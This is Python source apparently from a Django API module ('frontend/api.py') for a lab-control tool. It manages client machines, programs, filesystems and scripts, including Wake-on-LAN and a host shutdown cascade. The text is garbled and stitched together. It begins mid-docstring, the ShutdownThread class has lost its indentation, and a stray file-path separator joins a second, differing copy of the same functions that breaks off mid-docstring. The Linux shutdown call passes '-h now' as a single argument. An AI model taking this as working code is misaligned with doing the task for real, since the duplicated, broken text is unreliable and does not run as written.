        Script to overwrite, or None to create a new one.

    Returns
    -------
    StatusResponse
    """
    try:
        script = Script.from_json(data)
        if script_id is None:
            # POST: simply persist the freshly decoded script.
            script.save()
        else:
            # PUT: rename (or create) the target script, drop its old graph
            # entries and rebuild them from the decoded script.
            (model, _) = ScriptModel.objects.update_or_create(
                id=script_id,
                defaults={"name": script.name},
            )
            SGFModel.objects.filter(script_id=script_id).delete()
            SGPModel.objects.filter(script_id=script_id).delete()
            for entry in script.programs:
                entry.save(model)
            for entry in script.filesystems:
                entry.save(model)
        return StatusResponse.ok('')
    except FsimError as err:
        return StatusResponse(err)
    except KeyError as err:
        return StatusResponse.err(
            "Could not find required key {}".format(err.args[0]))
    except ValidationError as err:
        return StatusResponse.err('; '.join(err.messages))
    except (TypeError, ValueError, IntegrityError) as err:
        # These three all surface their plain string representation.
        return StatusResponse.err(str(err))
def convert_str_to_bool(string):
    """Interpret common truthy spellings as True; everything else is False.

    Parameters
    ----------
    string: str
        The text to interpret (case-insensitive).

    Returns
    -------
    bool:
        True iff the lowered string is one of 'yes', 'true', '1', 't', 'y'.

    Raises
    ------
    TypeError:
        If `string` is not a str instance.
    """
    ensure_type("string", string, str)
    truthy = ('y', 't', '1', 'true', 'yes')
    return string.lower() in truthy
def slave_set(request):
    """Collection endpoint for `SlaveModel`s.

    POST creates a new slave from the form data. GET lists slave names,
    filtered by ?q=<substring>, or restricted to slaves that own programs
    (?programs=true) or filesystems (?filesystems=true) -- asking for both
    at once is rejected.

    Returns
    -------
    HttpResponse:
        `HttpResponseForbidden` for unsupported methods.
    """
    if request.method == 'POST':
        form = SlaveForm(request.POST)
        if not form.is_valid():
            return StatusResponse.err(form.errors)
        form.save()
        return StatusResponse.ok('')
    if request.method != 'GET':
        return HttpResponseForbidden()
    query = request.GET.get('q', None)
    want_programs = convert_str_to_bool(request.GET.get('programs', ''))
    want_filesystems = convert_str_to_bool(request.GET.get('filesystems', ''))
    if query is not None:
        names = SlaveModel.objects.filter(
            name__contains=query).values_list(
                "name",
                flat=True,
            )
    elif want_programs and want_filesystems:
        # Both filters at once are ambiguous -- refuse.
        return StatusResponse(
            SimultaneousQueryError('filesystems', 'programs'))
    elif want_programs:
        names = SlaveModel.with_programs()
    elif want_filesystems:
        names = SlaveModel.with_filesystems()
    else:
        names = SlaveModel.objects.all().values_list(
            'name',
            flat=True,
        )
    return StatusResponse.ok(list(names))
def slave_entry(request, slave_id):
    """Single-object endpoint for a `SlaveModel`.

    DELETE removes the slave; PUT updates it from the request body.

    Returns
    -------
    HttpResponse:
        `HttpResponseForbidden` for unsupported methods.
    """
    if request.method == 'DELETE':
        try:
            SlaveModel.objects.get(id=slave_id).delete()
        except SlaveModel.DoesNotExist as err:
            return StatusResponse(SlaveNotExistError(err, slave_id))
        return StatusResponse.ok('')
    elif request.method == 'PUT':
        try:
            # request.PUT does not exist, so parse the raw body into a
            # QueryDict and treat the form as an update (instance=) of the
            # stored slave.
            slave = SlaveModel.objects.get(id=slave_id)
            form = SlaveForm(QueryDict(request.body), instance=slave)
            if not form.is_valid():
                return StatusResponse.err(form.errors)
            form.save()
            return StatusResponse.ok('')
        except SlaveModel.DoesNotExist as err:
            return StatusResponse(SlaveNotExistError(err, slave_id))
    else:
        return HttpResponseForbidden()
def slave_shutdown(request, slave_id):
    """POST: ask the client `slave_id` to shut itself down (see
    @frontend.controller.slave_shutdown).

    Returns
    -------
    HttpResponse:
        `HttpResponseForbidden` for non-POST requests.
    """
    if request.method != 'POST':
        return HttpResponseForbidden()
    try:
        controller.slave_shutdown(SlaveModel.objects.get(id=slave_id))
        return StatusResponse.ok('')
    except FsimError as err:
        return StatusResponse(err)
    except SlaveModel.DoesNotExist as err:
        return StatusResponse(SlaveNotExistError(err, slave_id))
def slave_wol(request, slave_id):
    """POST: send a Wake-on-LAN packet to the client `slave_id` (see
    @frontend.controller.slave_wake_on_lan).

    Returns
    -------
    HttpResponse:
        `HttpResponseForbidden` for non-POST requests.
    """
    if request.method != 'POST':
        return HttpResponseForbidden()
    try:
        slave_wake_on_lan(SlaveModel.objects.get(id=slave_id))
        return StatusResponse.ok('')
    except SlaveModel.DoesNotExist as err:
        return StatusResponse(SlaveNotExistError(err, slave_id))
def program_set(request):
    """Collection endpoint for `ProgramModel`s.

    POST creates a new program. GET lists program names, optionally
    filtered by ?q=<substring> or by ?slave=<id-or-name>&is_string=<bool>
    (is_string says whether `slave` is a name or a numeric id).

    Returns
    -------
    HttpResponse:
        `HttpResponseForbidden` for unsupported methods.
    """
    if request.method == 'POST':
        form = ProgramForm(request.POST or None)
        if not form.is_valid():
            return StatusResponse.err(form.errors)
        program = form.save(commit=False)
        program.slave = form.cleaned_data['slave']
        try:
            program.full_clean()
            form.save()
        except ValidationError:
            # full_clean() trips the (name, slave) uniqueness constraint;
            # report it on the name field.
            return StatusResponse.err({
                'name':
                ["Program with this Name already exists on this Client."]
            })
        return StatusResponse.ok('')
    elif request.method == 'GET':
        query = request.GET.get('q', None)
        slave = request.GET.get('slave', None)
        slave_str = request.GET.get('is_string', False)
        if query is not None:
            names = ProgramModel.objects.filter(
                name__contains=query).values_list(
                    "name",
                    flat=True,
                )
        elif slave is not None:
            if slave_str:
                slave_str = convert_str_to_bool(slave_str)
            try:
                slave = SlaveModel.from_identifier(slave, slave_str)
            except FsimError as err:
                return StatusResponse(err)
            except SlaveModel.DoesNotExist as err:
                return StatusResponse(SlaveNotExistError(err, slave))
            names = ProgramModel.objects.filter(slave=slave).values_list(
                "name",
                flat=True,
            )
        else:
            names = ProgramModel.objects.all().values_list(
                "name",
                flat=True,
            )
        return StatusResponse.ok(list(names))
    else:
        return HttpResponseForbidden()
def program_entry(request, program_id):
    """Single-object endpoint for a `ProgramModel`.

    DELETE removes the program; PUT updates it from the request body.

    Returns
    -------
    HttpResponse:
        `HttpResponseForbidden` for unsupported methods.
    """
    if request.method == 'DELETE':
        try:
            ProgramModel.objects.get(id=program_id).delete()
        except ProgramModel.DoesNotExist as err:
            return StatusResponse(ProgramNotExistError(err, program_id))
        return StatusResponse.ok('')
    elif request.method == 'PUT':
        try:
            # request.PUT does not exist -> rebuild the form from the raw
            # body as an update (instance=) of the stored program.
            model = ProgramModel.objects.get(id=program_id)
            form = ProgramForm(QueryDict(request.body), instance=model)
            if not form.is_valid():
                return StatusResponse.err(form.errors)
            program = form.save(commit=False)
            try:
                program.full_clean()
                form.save()
            except ValidationError:
                return StatusResponse.err({
                    'name': [
                        'Program with this Name already exists on this Client.'
                    ]
                })
            return StatusResponse.ok('')
        except ProgramModel.DoesNotExist as err:
            return StatusResponse(ProgramNotExistError(err, program_id))
    else:
        return HttpResponseForbidden()
def program_start(request, program_id):
    """POST: start program `program_id` on its client (see
    @frontend.controller.prog_start).

    Returns
    -------
    HttpResponse:
        `HttpResponseForbidden` for non-POST requests.
    """
    if request.method != 'POST':
        return HttpResponseForbidden()
    try:
        prog_start(ProgramModel.objects.get(id=program_id))
        return StatusResponse.ok('')
    except FsimError as err:
        return StatusResponse(err)
    except ProgramModel.DoesNotExist as err:
        return StatusResponse(ProgramNotExistError(err, program_id))
def program_stop(request, program_id):
    """POST: stop program `program_id` on its client (see
    @frontend.controller.prog_stop).

    Returns
    -------
    HttpResponse:
        `HttpResponseForbidden` for non-POST requests.
    """
    if request.method != 'POST':
        return HttpResponseForbidden()
    try:
        program = ProgramModel.objects.get(id=program_id)
    except ProgramModel.DoesNotExist as err:
        return StatusResponse(ProgramNotExistError(err, program_id))
    try:
        prog_stop(program)
        return StatusResponse.ok('')
    except FsimError as err:
        return StatusResponse(err)
def program_log_entry(request, program_id):
    """GET: request the log of program `program_id` from its client (see
    @frontend.controller.prog_log_get).

    Returns
    -------
    HttpResponse:
        `HttpResponseForbidden` for non-GET requests.
    """
    if request.method != 'GET':
        return HttpResponseForbidden()
    try:
        prog_log_get(ProgramModel.objects.get(id=program_id))
        return StatusResponse.ok('')
    except FsimError as err:
        return StatusResponse(err)
    except ProgramModel.DoesNotExist as err:
        return StatusResponse(ProgramNotExistError(err, program_id))
def program_log_enable(request, program_id):
    """POST: tell the client to start streaming logs for program
    `program_id` (see @frontend.controller.prog_log_enable).

    Returns
    -------
    HttpResponse:
        `HttpResponseForbidden` for non-POST requests.
    """
    if request.method != 'POST':
        return HttpResponseForbidden()
    try:
        prog_log_enable(ProgramModel.objects.get(id=program_id))
        return StatusResponse.ok('')
    except FsimError as err:
        return StatusResponse(err)
    except ProgramModel.DoesNotExist as err:
        return StatusResponse(ProgramNotExistError(err, program_id))
def program_log_disable(request, program_id):
    """POST: tell the client to stop streaming logs for program
    `program_id` (see @frontend.controller.prog_log_disable).

    Returns
    -------
    HttpResponse:
        `HttpResponseForbidden` for non-POST requests.
    """
    if request.method != 'POST':
        return HttpResponseForbidden()
    try:
        prog_log_disable(ProgramModel.objects.get(id=program_id))
        return StatusResponse.ok('')
    except FsimError as err:
        return StatusResponse(err)
    except ProgramModel.DoesNotExist as err:
        return StatusResponse(ProgramNotExistError(err, program_id))
def script_set(request):
    """POST: create a new `ScriptModel` from the JSON request body.

    Returns
    -------
    HttpResponse:
        `HttpResponseForbidden` for non-POST requests.
    """
    if request.method != 'POST':
        return HttpResponseForbidden()
    # script_id=None means "create new" (see script_put_post).
    return script_put_post(request.body.decode('utf-8'), None)
def script_entry(request, script_id):
    """Single-object endpoint for a `ScriptModel`.

    GET returns the script as JSON; the ?slaves=, ?programs= and
    ?filesystems= parameters ('int' or 'str', default 'int') select how
    referenced objects are encoded. PUT replaces the script from the
    request body; DELETE removes it.

    Returns
    -------
    HttpResponse:
        `HttpResponseForbidden` for unsupported methods.
    """
    if request.method == 'GET':
        try:
            script = Script.from_model(
                script_id,
                request.GET.get('slaves', 'int'),
                request.GET.get('programs', 'int'),
                request.GET.get('filesystems', 'int'),
            )
            return StatusResponse.ok(dict(script))
        except FsimError as err:
            return StatusResponse(err)
        except ScriptModel.DoesNotExist as err:
            return StatusResponse(ScriptNotExistError(err, script_id))
    elif request.method == 'PUT':
        return script_put_post(request.body.decode('utf-8'), int(script_id))
    elif request.method == 'DELETE':
        try:
            ScriptModel.objects.get(id=script_id).delete()
        except ScriptModel.DoesNotExist as err:
            return StatusResponse(ScriptNotExistError(err, script_id))
        return StatusResponse.ok('')
    else:
        return HttpResponseForbidden()
def script_copy(request, script_id):
    """POST: create a deep copy of script `script_id` (see
    @frontend.controller.script_deep_copy).

    Returns
    -------
    HttpResponse:
        `HttpResponseForbidden` for non-POST requests.
    """
    if request.method != 'POST':
        return HttpResponseForbidden()
    try:
        script_deep_copy(ScriptModel.objects.get(id=script_id))
        return StatusResponse.ok('')
    except ScriptModel.DoesNotExist as err:
        return StatusResponse(ScriptNotExistError(err, script_id))
def script_run(request, script_id):
    """POST: schedule script `script_id` for execution, unless another
    script is still running.

    Returns
    -------
    HttpResponse:
        `HttpResponseForbidden` for non-POST requests.
    """
    if request.method != 'POST':
        return HttpResponseForbidden()
    try:
        script = ScriptModel.objects.get(id=script_id)
    except ScriptModel.DoesNotExist as err:
        return StatusResponse(ScriptNotExistError(err, script_id))
    # Refuse to start while a previously started script is in flight.
    if ScriptModel.objects.filter(
            is_running=True, is_initialized=True).exists():
        return StatusResponse(ScriptRunningError(str(script.name)))
    FSIM_CURRENT_SCHEDULER.start(script.id)
    FSIM_CURRENT_SCHEDULER.notify()
    return StatusResponse.ok('')
def script_stop(request):
    """POST: stop the currently running script via the scheduler (see
    @frontend.sheduler.stop_loop).

    Returns
    -------
    HttpResponse:
        `HttpResponseForbidden` for non-POST requests.
    """
    if request.method != 'POST':
        return HttpResponseForbidden()
    FSIM_CURRENT_SCHEDULER.stop()
    FSIM_CURRENT_SCHEDULER.notify()
    return StatusResponse.ok('')
def script_set_default(request, script_id):
    """POST: mark script `script_id` as the last started (default) one.

    Returns
    -------
    HttpResponse:
        `HttpResponseForbidden` for non-POST requests.
    """
    if request.method != 'POST':
        return HttpResponseForbidden()
    ScriptModel.set_last_started(script_id)
    return StatusResponse.ok('')
def filesystem_set(request):
    """Collection endpoint for `FilesystemModel`s.

    POST creates a filesystem entry. GET lists filesystem names, optionally
    filtered by ?q=<substring> or by ?slave=<id-or-name>&is_string=<bool>
    (is_string says whether `slave` is a name or a numeric id).

    Returns
    -------
    HttpResponse:
        `HttpResponseForbidden` for unsupported methods.
    """
    if request.method == 'POST':
        form = FilesystemForm(request.POST or None)
        if form.is_valid():
            filesystem = form.save(commit=False)
            filesystem.slave = form.cleaned_data['slave']
            try:
                filesystem.full_clean()
                # IMPORTANT: remove trailing path seperator (if not the query
                # will not work [the query in filesystem_move])
                filesystem.destination_path = up.remove_trailing_path_seperator(
                    filesystem.destination_path)
                filesystem.source_path = up.remove_trailing_path_seperator(
                    filesystem.source_path)
                form.save()
                return StatusResponse.ok("")
            except ValidationError as err:
                LOGGER.warning(
                    "Error while adding filesystem `%s`: %s",
                    filesystem.name,
                    err,
                )
                # BUGFIX: the non-field messages may be absent (field-level
                # errors only) -- the old direct ['__all__'] lookup raised
                # KeyError in that case.
                string = err.message_dict.get('__all__', [''])[0]
                if 'Source path' in string and 'Destination path' in string and 'Slave' in string:
                    error_msg = 'Filesystem with this source path and destination path already exists on this Client.'
                    error_dict = {
                        'source_path': [error_msg],
                        'destination_path': [error_msg],
                    }
                elif 'Name' in string and 'Slave' in string:
                    error_dict = {
                        'name': [
                            'Filesystem with this Name already exists on this Client.'
                        ]
                    }
                else:
                    # BUGFIX: previously `error_dict` stayed unbound when the
                    # message matched neither uniqueness constraint, raising
                    # UnboundLocalError; fall back to the raw message dict.
                    error_dict = err.message_dict
                return StatusResponse.err(error_dict)
        else:
            return StatusResponse.err(form.errors)
    elif request.method == 'GET':
        query = request.GET.get('q', None)
        slave = request.GET.get('slave', None)
        slave_str = request.GET.get('is_string', False)
        if query is not None:
            filesystems = FilesystemModel.objects.filter(
                name__contains=query).values_list(
                    "name",
                    flat=True,
                )
        elif slave is not None:
            if slave_str:
                slave_str = convert_str_to_bool(slave_str)
            try:
                slave = SlaveModel.from_identifier(slave, slave_str)
            except FsimError as err:
                return StatusResponse(err)
            except SlaveModel.DoesNotExist as err:
                return StatusResponse(SlaveNotExistError(err, slave))
            filesystems = FilesystemModel.objects.filter(
                slave=slave).values_list(
                    "name",
                    flat=True,
                )
        else:
            filesystems = FilesystemModel.objects.all().values_list(
                "name",
                flat=True,
            )
        return StatusResponse.ok(list(filesystems))
    else:
        return HttpResponseForbidden()
def filesystem_move(request, filesystem_id):
    """POST: apply (move) filesystem `filesystem_id` on its client (see
    @frontend.controller.fs_move).

    Returns
    -------
    HttpResponse:
        `HttpResponseForbidden` for non-POST requests.
    """
    if request.method != 'POST':
        return HttpResponseForbidden()
    try:
        filesystem = FilesystemModel.objects.get(id=filesystem_id)
    except FilesystemModel.DoesNotExist as err:
        return StatusResponse(FilesystemNotExistError(err, filesystem_id))
    try:
        fs_move(filesystem)
        return StatusResponse(Status.ok(""))
    except FsimError as err:
        return StatusResponse(err)
def filesystem_restore(request, filesystem_id):
    """POST: restore filesystem `filesystem_id` on its client (see
    @frontend.controller.fs_restore).

    Returns
    -------
    HttpResponse:
        `HttpResponseForbidden` for non-POST requests.
    """
    if request.method != 'POST':
        return HttpResponseForbidden()
    try:
        filesystem = FilesystemModel.objects.get(id=filesystem_id)
    except FilesystemModel.DoesNotExist as err:
        return StatusResponse(FilesystemNotExistError(err, filesystem_id))
    try:
        fs_restore(filesystem)
        return StatusResponse(Status.ok(""))
    except FsimError as err:
        return StatusResponse(err)
def filesystem_entry(request, filesystem_id):
    """Single-object endpoint for a `FilesystemModel`.

    DELETE removes the filesystem (via the client); PUT updates it from
    the request body.

    Returns
    -------
    HttpResponse:
        `HttpResponseForbidden` for unsupported methods.
    """
    if request.method == 'DELETE':
        try:
            filesystem = FilesystemModel.objects.get(id=filesystem_id)
        except FilesystemModel.DoesNotExist as err:
            return StatusResponse(FilesystemNotExistError(err, filesystem_id))
        try:
            fs_delete(filesystem)
            return StatusResponse.ok("")
        except FsimError as err:
            return StatusResponse(err)
    elif request.method == 'PUT':
        try:
            # request.PUT does not exist -> rebuild the form from the raw
            # body as an update (instance=) of the stored filesystem.
            model = FilesystemModel.objects.get(id=filesystem_id)
            form = FilesystemForm(QueryDict(request.body), instance=model)
            if not form.is_valid():
                return StatusResponse(Status.err(form.errors))
            filesystem = form.save(commit=False)
            try:
                filesystem.full_clean()
                form.save()
            except ValidationError:
                return StatusResponse(Status.err({
                    'name': [
                        'Filesystem with this Name already exists on this Client.'
                    ]
                }))
            return StatusResponse.ok('')
        except FilesystemModel.DoesNotExist as err:
            return StatusResponse(FilesystemNotExistError(err, filesystem_id))
    else:
        return HttpResponseForbidden()
def scope_operations(request):
    """POST: stop the scheduler and shut down the requested scope
    (programs, filesystems, clients, and finally this host) in the
    background.

    Returns
    -------
    HttpResponse:
        `HttpResponseForbidden` for non-POST requests.
    """
    if request.method != 'POST':
        return HttpResponseForbidden()
    FSIM_CURRENT_SCHEDULER.stop()
    FSIM_CURRENT_SCHEDULER.notify()
    # The shutdown cascade runs in a worker thread so this response is
    # not delayed by the scheduled stops.
    ShutdownThread(request.POST['scope']).start()
    return StatusResponse.ok('')
class ShutdownThread(threading.Thread):
def __init__(self, scope):
threading.Thread.__init__(self)
self.scope = scope
def run(self): # pragma: no cover
s = sched.scheduler()
programs = ProgramModel.objects.all()
programs = filter(lambda x: x.is_running, programs)
delay = 0
for program in programs:
s.enter(delay, 2, prog_stop, argument=(program, ))
delay += 1
if self.scope == 'programs':
s.run()
return
filesystems = FilesystemModel.objects.all()
filesystems = filter(lambda x: x.is_moved, filesystems)
delay += 10
for filesystem in filesystems:
s.enter(delay, 1, fs_restore, argument=(filesystem, ))
if self.scope == 'filesystem':
s.run()
return
slaves = SlaveModel.objects.all()
slaves = filter(lambda x: x.is_online, slaves)
delay += 8
for slave in slaves:
s.enter(delay, 3, controller.slave_shutdown, argument=(slave, ))
delay += 1
if self.scope == 'clients':
s.run()
return
s.run()
if platform.system() == "Windows":
subprocess.run(['shutdown', '-s', '-t', '0'])
else:
subprocess.run(['shutdown', '-h now']) | frontend/api.py | import logging
import platform
import sched, threading
import subprocess
from django.http import HttpResponseForbidden
from django.http.request import QueryDict
from django.core.exceptions import ValidationError
from django.db.utils import IntegrityError
from utils import Status
from utils.typecheck import ensure_type
import utils.path as up
from server.utils import StatusResponse
from .models import (
Slave as SlaveModel,
Program as ProgramModel,
Script as ScriptModel,
Filesystem as FilesystemModel,
ScriptGraphFiles as SGFModel,
ScriptGraphPrograms as SGPModel,
)
from .scripts import Script
from .forms import SlaveForm, ProgramForm, FilesystemForm
from .errors import (
FsimError,
SlaveNotExistError,
ProgramNotExistError,
FilesystemNotExistError,
SimultaneousQueryError,
ScriptRunningError,
ScriptNotExistError,
)
from frontend import controller
from .controller import (
prog_start,
prog_stop,
fs_delete,
fs_move,
fs_restore,
prog_log_disable,
prog_log_enable,
prog_log_get,
script_deep_copy,
slave_wake_on_lan,
)
LOGGER = logging.getLogger("fsim.api")  # module-level logger shared by all API views
def script_put_post(data, script_id):
    """Shared body of the POST (`script_set`) and PUT (`script_entry`)
    handlers: decode `data` as a script and create or replace it.

    Parameters
    ----------
    data: str
        JSON encoded script.
    script_id: int or None
        Script to overwrite, or None to create a new one.

    Returns
    -------
    StatusResponse
    """
    try:
        script = Script.from_json(data)
        if script_id is None:
            # POST: simply persist the freshly decoded script.
            script.save()
        else:
            # PUT: rename (or create) the target script, drop its old graph
            # entries and rebuild them from the decoded script.
            (model, _) = ScriptModel.objects.update_or_create(
                id=script_id,
                defaults={"name": script.name},
            )
            SGFModel.objects.filter(script_id=script_id).delete()
            SGPModel.objects.filter(script_id=script_id).delete()
            for entry in script.programs:
                entry.save(model)
            for entry in script.filesystems:
                entry.save(model)
        return StatusResponse.ok('')
    except FsimError as err:
        return StatusResponse(err)
    except KeyError as err:
        return StatusResponse.err(
            "Could not find required key {}".format(err.args[0]))
    except ValidationError as err:
        return StatusResponse.err('; '.join(err.messages))
    except (TypeError, ValueError, IntegrityError) as err:
        # These three all surface their plain string representation.
        return StatusResponse.err(str(err))
def convert_str_to_bool(string):
    """Interpret common truthy spellings as True; everything else is False.

    Parameters
    ----------
    string: str
        The text to interpret (case-insensitive).

    Returns
    -------
    bool:
        True iff the lowered string is one of 'yes', 'true', '1', 't', 'y'.

    Raises
    ------
    TypeError:
        If `string` is not a str instance.
    """
    ensure_type("string", string, str)
    truthy = ('y', 't', '1', 'true', 'yes')
    return string.lower() in truthy
def slave_set(request):
    """Collection endpoint for `SlaveModel`s.

    POST creates a new slave from the form data. GET lists slave names,
    filtered by ?q=<substring>, or restricted to slaves that own programs
    (?programs=true) or filesystems (?filesystems=true) -- asking for both
    at once is rejected.

    Returns
    -------
    HttpResponse:
        `HttpResponseForbidden` for unsupported methods.
    """
    if request.method == 'POST':
        form = SlaveForm(request.POST)
        if not form.is_valid():
            return StatusResponse.err(form.errors)
        form.save()
        return StatusResponse.ok('')
    if request.method != 'GET':
        return HttpResponseForbidden()
    query = request.GET.get('q', None)
    want_programs = convert_str_to_bool(request.GET.get('programs', ''))
    want_filesystems = convert_str_to_bool(request.GET.get('filesystems', ''))
    if query is not None:
        names = SlaveModel.objects.filter(
            name__contains=query).values_list(
                "name",
                flat=True,
            )
    elif want_programs and want_filesystems:
        # Both filters at once are ambiguous -- refuse.
        return StatusResponse(
            SimultaneousQueryError('filesystems', 'programs'))
    elif want_programs:
        names = SlaveModel.with_programs()
    elif want_filesystems:
        names = SlaveModel.with_filesystems()
    else:
        names = SlaveModel.objects.all().values_list(
            'name',
            flat=True,
        )
    return StatusResponse.ok(list(names))
def slave_entry(request, slave_id):
    """Handle requests addressing a single `SlaveModel`.

    DELETE removes the slave given by `slave_id`; PUT updates it from the
    request body.  Other methods yield an `HttpResponseForbidden`.

    Parameters
    ----------
    request: HttpRequest
        The request which should be processed.

    Returns
    -------
    HttpResponse
    """
    if request.method == 'DELETE':
        try:
            SlaveModel.objects.get(id=slave_id).delete()
        except SlaveModel.DoesNotExist as err:
            return StatusResponse(SlaveNotExistError(err, slave_id))
        return StatusResponse.ok('')
    if request.method == 'PUT':
        try:
            # request.PUT does not exist, so rebuild the form data from the
            # raw body and bind it to the existing instance as an update.
            model = SlaveModel.objects.get(id=slave_id)
            form = SlaveForm(QueryDict(request.body), instance=model)
            if not form.is_valid():
                return StatusResponse.err(form.errors)
            form.save()
            return StatusResponse.ok('')
        except SlaveModel.DoesNotExist as err:
            return StatusResponse(SlaveNotExistError(err, slave_id))
    return HttpResponseForbidden()
def slave_shutdown(request, slave_id):
    """Trigger a shutdown of the client behind a `SlaveModel` (POST only).

    Looks up the slave given by `slave_id` and delegates to
    `controller.slave_shutdown`.  Other methods yield an
    `HttpResponseForbidden`.

    Parameters
    ----------
    request: HttpRequest
        The request which should be processed.

    Returns
    -------
    HttpResponse
    """
    if request.method != 'POST':
        return HttpResponseForbidden()
    try:
        controller.slave_shutdown(SlaveModel.objects.get(id=slave_id))
        return StatusResponse.ok('')
    except FsimError as err:
        return StatusResponse(err)
    except SlaveModel.DoesNotExist as err:
        return StatusResponse(SlaveNotExistError(err, slave_id))
def slave_wol(request, slave_id):
    """Send a Wake-on-LAN request for a `SlaveModel` (POST only).

    Looks up the slave given by `slave_id` and delegates to
    `slave_wake_on_lan`.  Other methods yield an `HttpResponseForbidden`.

    Parameters
    ----------
    request: HttpRequest
        The request which should be processed.

    Returns
    -------
    HttpResponse
    """
    if request.method == 'POST':
        try:
            slave = SlaveModel.objects.get(id=slave_id)
            slave_wake_on_lan(slave)
            return StatusResponse.ok('')
        except FsimError as err:
            # Consistency fix: every sibling invocation view (e.g.
            # `slave_shutdown`, `program_start`) reports controller
            # failures as a status instead of letting them bubble up
            # into a 500.
            return StatusResponse(err)
        except SlaveModel.DoesNotExist as err:
            return StatusResponse(SlaveNotExistError(err, slave_id))
    else:
        return HttpResponseForbidden()
def program_set(request):
    """Handle collection-level requests for `ProgramModel`s.

    POST creates a new program from the submitted form data.  GET
    supports ``?q=<text>`` (substring search on the name) and
    ``?slave=<id-or-name>&is_string=<bool>`` (all programs of one slave,
    where ``is_string`` says whether ``slave`` is a unique name or a
    unique index).  Other methods yield an `HttpResponseForbidden`.

    Parameters
    ----------
    request: HttpRequest
        The request which should be processed.

    Returns
    -------
    HttpResponse
    """
    if request.method == 'POST':
        form = ProgramForm(request.POST or None)
        if not form.is_valid():
            return StatusResponse.err(form.errors)
        program = form.save(commit=False)
        program.slave = form.cleaned_data['slave']
        try:
            program.full_clean()
            form.save()
            return StatusResponse.ok('')
        except ValidationError as _:
            # The only model-level constraint is name uniqueness per slave.
            return StatusResponse.err({
                'name':
                ["Program with this Name already exists on this Client."]
            })
    if request.method == 'GET':
        query = request.GET.get('q', None)
        slave = request.GET.get('slave', None)
        slave_str = request.GET.get('is_string', False)
        if query is not None:
            progs = ProgramModel.objects.filter(
                name__contains=query).values_list(
                    "name",
                    flat=True,
                )
        elif slave is not None:
            if slave_str:
                slave_str = convert_str_to_bool(slave_str)
            try:
                slave = SlaveModel.from_identifier(slave, slave_str)
            except FsimError as err:
                return StatusResponse(err)
            except SlaveModel.DoesNotExist as err:
                return StatusResponse(SlaveNotExistError(err, slave))
            progs = ProgramModel.objects.filter(slave=slave).values_list(
                "name",
                flat=True,
            )
        else:
            progs = ProgramModel.objects.all().values_list(
                "name",
                flat=True,
            )
        return StatusResponse.ok(list(progs))
    return HttpResponseForbidden()
def program_entry(request, program_id):
    """Handle requests addressing a single `ProgramModel`.

    DELETE removes the program given by `program_id`; PUT updates it
    from the request body.  Other methods yield an
    `HttpResponseForbidden`.

    Parameters
    ----------
    request: HttpRequest
        The request which should be processed.

    Returns
    -------
    HttpResponse
    """
    if request.method == 'DELETE':
        try:
            ProgramModel.objects.get(id=program_id).delete()
        except ProgramModel.DoesNotExist as err:
            return StatusResponse(ProgramNotExistError(err, program_id))
        return StatusResponse.ok('')
    if request.method == 'PUT':
        try:
            # request.PUT does not exist, so rebuild the form data from
            # the raw body and bind it to the existing instance.
            model = ProgramModel.objects.get(id=program_id)
            form = ProgramForm(QueryDict(request.body), instance=model)
            if not form.is_valid():
                return StatusResponse.err(form.errors)
            program = form.save(commit=False)
            try:
                program.full_clean()
                form.save()
                return StatusResponse.ok('')
            except ValidationError as _:
                return StatusResponse.err({
                    'name': [
                        'Program with this Name already exists on this Client.'
                    ]
                })
        except ProgramModel.DoesNotExist as err:
            return StatusResponse(ProgramNotExistError(err, program_id))
    return HttpResponseForbidden()
def program_start(request, program_id):
    """Start the program behind a `ProgramModel` (POST only).

    Delegates to `prog_start`.  Other methods yield an
    `HttpResponseForbidden`.

    Parameters
    ----------
    request: HttpRequest
        The request which should be processed.

    Returns
    -------
    HttpResponse
    """
    if request.method != 'POST':
        return HttpResponseForbidden()
    try:
        prog_start(ProgramModel.objects.get(id=program_id))
        return StatusResponse.ok('')
    except FsimError as err:
        return StatusResponse(err)
    except ProgramModel.DoesNotExist as err:
        return StatusResponse(ProgramNotExistError(err, program_id))
def program_stop(request, program_id):
    """Stop the program behind a `ProgramModel` (POST only).

    Delegates to `prog_stop`.  Other methods yield an
    `HttpResponseForbidden`.

    Parameters
    ----------
    request: HttpRequest
        The request which should be processed.

    Returns
    -------
    HttpResponse
    """
    if request.method != 'POST':
        return HttpResponseForbidden()
    try:
        program = ProgramModel.objects.get(id=program_id)
        prog_stop(program)
        return StatusResponse.ok('')
    except FsimError as err:
        return StatusResponse(err)
    except ProgramModel.DoesNotExist as err:
        return StatusResponse(ProgramNotExistError(err, program_id))
def program_log_entry(request, program_id):
    """Request the log of a `ProgramModel` from its client (GET only).

    Delegates to `prog_log_get`.  Other methods yield an
    `HttpResponseForbidden`.

    Parameters
    ----------
    request: HttpRequest
        The request which should be processed.

    Returns
    -------
    HttpResponse
    """
    if request.method != 'GET':
        return HttpResponseForbidden()
    try:
        prog_log_get(ProgramModel.objects.get(id=program_id))
        return StatusResponse.ok('')
    except FsimError as err:
        return StatusResponse(err)
    except ProgramModel.DoesNotExist as err:
        return StatusResponse(ProgramNotExistError(err, program_id))
def program_log_enable(request, program_id):
    """Ask the client to start sending logs for a `ProgramModel` (POST only).

    Delegates to `prog_log_enable`.  Other methods yield an
    `HttpResponseForbidden`.

    Parameters
    ----------
    request: HttpRequest
        The request which should be processed.

    Returns
    -------
    HttpResponse
    """
    if request.method != 'POST':
        return HttpResponseForbidden()
    try:
        prog_log_enable(ProgramModel.objects.get(id=program_id))
        return StatusResponse.ok('')
    except FsimError as err:
        return StatusResponse(err)
    except ProgramModel.DoesNotExist as err:
        return StatusResponse(ProgramNotExistError(err, program_id))
def program_log_disable(request, program_id):
    """Ask the client to stop sending logs for a `ProgramModel` (POST only).

    Delegates to `prog_log_disable`.  Other methods yield an
    `HttpResponseForbidden`.

    Parameters
    ----------
    request: HttpRequest
        The request which should be processed.

    Returns
    -------
    HttpResponse
    """
    if request.method != 'POST':
        return HttpResponseForbidden()
    try:
        prog_log_disable(ProgramModel.objects.get(id=program_id))
        return StatusResponse.ok('')
    except FsimError as err:
        return StatusResponse(err)
    except ProgramModel.DoesNotExist as err:
        return StatusResponse(ProgramNotExistError(err, program_id))
def script_set(request):
    """Create a new `ScriptModel` from the JSON request body (POST only).

    Delegates to `script_put_post` with no existing script id.  Other
    methods yield an `HttpResponseForbidden`.

    Parameters
    ----------
    request: HttpRequest
        The request which should be processed.

    Returns
    -------
    HttpResponse
    """
    if request.method != 'POST':
        return HttpResponseForbidden()
    return script_put_post(request.body.decode('utf-8'), None)
def script_entry(request, script_id):
    """Handle requests addressing a single `ScriptModel`.

